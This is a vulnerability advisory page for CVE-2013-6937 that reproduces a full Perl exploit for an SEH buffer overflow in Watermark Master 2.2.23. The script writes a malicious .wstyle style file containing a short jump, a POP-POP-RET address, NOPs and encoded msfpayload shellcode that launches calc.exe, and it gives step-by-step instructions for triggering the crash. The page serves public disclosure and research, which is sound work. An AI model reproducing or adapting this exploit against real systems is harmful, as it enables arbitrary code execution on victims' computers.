Watermark Master 2.2.23 Buffer Overflow

2013-11-15 / 2013-12-05
Credit: Mike Czumak
Risk: High
Local: Yes
Remote: No
CVE: CVE-2013-6937
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl ######################################################################################### # Exploit Title: Watermark Master v2.2.23 .wstyle Buffer Overflow (SEH) # Date: 10-28-2013 # Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift # Vulnerable Software: Watermark Master v2.2.23 # Software Link: http://www.videocharge.com/download/WatermarkMaster_Install.exe # Version: 2.2.23 # Tested On: Windows XP SP3 ######################################################################################### # Timeline: # - Oct 28: Vuln discovered, vendor alerted and acknowledged receipt of bug submission # - Oct 29: Requested fix timeline from vendor for public disclosure # - Nov 1: Similar exploit publicaly released for same version of software # -- http://www.exploit-db.com/exploits/29327/ # - Nov 3: No response from vendor, follow-up email sent # - Nov 14: No response from vendor, public disclosure ######################################################################################### # Creates a malicious Style file (.wstyle) # # To exploit: # 1) Place sploit.wstyle file in Video Styles folder # ..\Videocharge Software\Watermark Master\Styles\Video # 2) Launch Watermark Master application, add an image and apply the style # WaterMark --> Add --> Image (can also add text, rectangle, etc) # WaterMark --> Apply Style... --> sploit # 3) Save (Ctrl+s) -- Application will crash, launching the exploit ######################################################################################### my $buffsize = 15000; # sets buffer size for consistent sized payload my $xmlstart = '<?xml version="1.0" encoding="Windows-1251" ?> <cols name="'; # build the start of the xml file # nseh is at offset 512, followed by 9484 bytes of available data my $junk = "\x41" x (512 - $xmlstart); my $nseh = "\xeb\x08\x90\x90"; # overwrite next seh with jmp instruction (8 bytes) my $seh = pack('V',0x72D11F39); # overwrite seh w/ pop edi pop esi ret # ASLR: False, Rebase: False, SafeSEH: False, OS: True # (C:\WINDOWS\system32\msacm32.drv) (no suitable app modules found) my $nops = "\x90" x 20; # Alpha-numeric encoding used for xml-based Calc.exe payload # msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | # msfencode -e x86/alpha_upper -b '\x00\xac\xff\xca' # size 469 my $shell = "\x89\xe6\xd9\xeb\xd9\x76\xf4\x5b\x53\x59\x49\x49\x49\x49" . "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" . "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" . "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" . "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" . "\x58\x4d\x59\x35\x50\x33\x30\x45\x50\x35\x30\x4c\x49\x4b" . "\x55\x46\x51\x48\x52\x42\x44\x4c\x4b\x50\x52\x36\x50\x4c" . "\x4b\x30\x52\x54\x4c\x4c\x4b\x46\x32\x42\x34\x4c\x4b\x34" . "\x32\x57\x58\x44\x4f\x58\x37\x50\x4a\x56\x46\x36\x51\x4b" . "\x4f\x50\x31\x59\x50\x4e\x4c\x37\x4c\x53\x51\x53\x4c\x44" . "\x42\x46\x4c\x37\x50\x49\x51\x58\x4f\x44\x4d\x33\x31\x58" . "\x47\x4a\x42\x5a\x50\x31\x42\x30\x57\x4c\x4b\x50\x52\x54" . "\x50\x4c\x4b\x57\x32\x47\x4c\x55\x51\x38\x50\x4c\x4b\x31" . "\x50\x34\x38\x4b\x35\x4f\x30\x43\x44\x51\x5a\x45\x51\x38" . "\x50\x36\x30\x4c\x4b\x30\x48\x34\x58\x4c\x4b\x36\x38\x51" . "\x30\x33\x31\x59\x43\x4b\x53\x57\x4c\x51\x59\x4c\x4b\x46" . "\x54\x4c\x4b\x45\x51\x39\x46\x46\x51\x4b\x4f\x50\x31\x59" . "\x50\x4e\x4c\x4f\x31\x48\x4f\x34\x4d\x55\x51\x58\x47\x56" . "\x58\x4d\x30\x33\x45\x4c\x34\x54\x43\x53\x4d\x5a\x58\x47" . "\x4b\x33\x4d\x31\x34\x33\x45\x4b\x52\x46\x38\x4c\x4b\x31" . "\x48\x31\x34\x35\x51\x4e\x33\x55\x36\x4c\x4b\x44\x4c\x50" . "\x4b\x4c\x4b\x56\x38\x35\x4c\x43\x31\x59\x43\x4c\x4b\x45" . "\x54\x4c\x4b\x35\x51\x58\x50\x4c\x49\x31\x54\x57\x54\x37" . "\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x51\x4a\x36\x31\x4b" . "\x4f\x4d\x30\x30\x58\x31\x4f\x50\x5a\x4c\x4b\x35\x42\x5a" . "\x4b\x4c\x46\x31\x4d\x53\x5a\x45\x51\x4c\x4d\x4d\x55\x4e" . "\x59\x33\x30\x45\x50\x53\x30\x50\x50\x32\x48\x56\x51\x4c" . "\x4b\x52\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x4b\x4e\x54" . "\x4e\x57\x42\x5a\x4a\x33\x58\x4f\x56\x4d\x45\x4f\x4d\x4d" . "\x4d\x4b\x4f\x38\x55\x57\x4c\x54\x46\x53\x4c\x34\x4a\x4b" . "\x30\x4b\x4b\x4b\x50\x52\x55\x34\x45\x4f\x4b\x57\x37\x32" . "\x33\x33\x42\x52\x4f\x52\x4a\x43\x30\x51\x43\x4b\x4f\x39" . "\x45\x45\x33\x35\x31\x42\x4c\x33\x53\x46\x4e\x32\x45\x34" . "\x38\x53\x55\x53\x30\x41\x41"; my $xmlend = '" clsid="blah"> </cols>'; # build the rest of the xml file my $sploit = $junk.$nseh.$seh.$nops.$shell; # build sploit portion of buffer my $fill = "\x43" x ($buffsize - (length($xmlstart)+length($sploit)+length($xmlend))); # fill remainder of buffer with junk for consistent size my $buffer = $xmlstart.$sploit.$fill.$xmlend; # build final buffer # write the exploit buffer to file my $file = "sploit.wstyle"; open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file created [" . $file . "]\n"; print "Buffer size: " . length($buffer) . "\n";

References:

http://cxsecurity.com/issue/WLB-2013110013


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top